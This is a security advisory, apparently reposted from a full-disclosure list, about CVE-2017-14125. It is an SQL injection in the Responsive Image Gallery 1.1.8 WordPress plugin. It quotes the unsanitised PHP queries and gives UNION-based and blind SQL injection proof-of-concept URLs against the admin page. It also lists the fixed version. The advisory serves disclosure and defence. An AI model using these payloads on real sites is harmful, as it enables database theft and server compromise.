WordPress Responsive Image Gallery 1.1.8 SQL Injection Vulnerability

🗓️ 23 Sep 2017 00:00:00Reported by Manuel Garcia CardenasType

zdt🔗 0day.today👁 44 Views

WordPress Responsive Image Gallery 1.1.8 SQL Injection Vulnerability discovered by Manuel GarcAa CA!rdena

Reporter	Title	Published	Views	Family All 9
CNVD	WordPress Responsive Image Gallery Plugin SQL Injection Vulnerability	25 Sep 201700:00	–	cnvd
CVE	CVE-2017-14125	25 Sep 201717:00	–	cve
Cvelist	CVE-2017-14125	25 Sep 201717:00	–	cvelist
EUVD	EUVD-2017-5637	7 Oct 202500:30	–	euvd
NVD	CVE-2017-14125	25 Sep 201717:29	–	nvd
OSV	CVE-2017-14125	25 Sep 201717:29	–	osv
Packet Storm	WordPress Responsive Image Gallery 1.1.8 SQL Injection	21 Sep 201700:00	–	packetstorm
Prion	Sql injection	25 Sep 201717:29	–	prion
WPVulnDB	Responsive Image Gallery, Gallery Album <= 1.2.0 - Authenticated SQL Injection	22 Sep 201700:00	–	wpvulndb

=============================================
- Discovered by: Manuel GarcAa CA!rdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2017-14125
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Responsive Image Gallery 1.1.8 - SQL Injection

II. BACKGROUND
-------------------------
Gallery is very important tool for any website. The most of users have
Galleries on their website. Our Gallery plugin allow you to display your
Galleries with awesome views and animation effects, so you need to try our
plugin.

III. DESCRIPTION
-------------------------
This bug was found using the portal in the files:

/gallery-album/includes/frontend/gallery_class.php
$theme = $wpdb->get_row( "SELECT * FROM
".wpdevart_gallery_databese::$table_names['theme']." WHERE `id` =
$theme_id" );
/gallery-album/includes/admin/gallery_theme.php
$theme_params = $wpdb->get_row('SELECT * FROM
'.wpdevart_gallery_databese::$table_names['theme'].' WHERE id='.$id);

And when the query is executed, the parameter "id" it is not sanitized.

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code.

IV. PROOF OF CONCEPT
-------------------------
The following URL have been confirmed to all suffer from SQL Injection.

Union SQL Injection POC:

/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=-1+UNION+ALL+SELECT+NULL,@@VERSION,NULL,NULL--

Blind SQL Injection POC:

/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=1+and+1=0

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
Responsive Image Gallery 1.1.8

VII. SOLUTION
-------------------------
Vendor release a new version 1.2.1
https://downloads.wordpress.org/plugin/gallery-album.1.2.1.zip

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/gallery-album/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
September 01, 2017 1: Initial release
September 25, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
September 01, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
September 01, 2017 2: Send to vendor
September 22, 2017 3: Vendor fix the vulnerability and release a new version
September 25, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

#  0day.today [2018-04-09]  #

23 Sep 2017 00:00Current

EPSS0.01872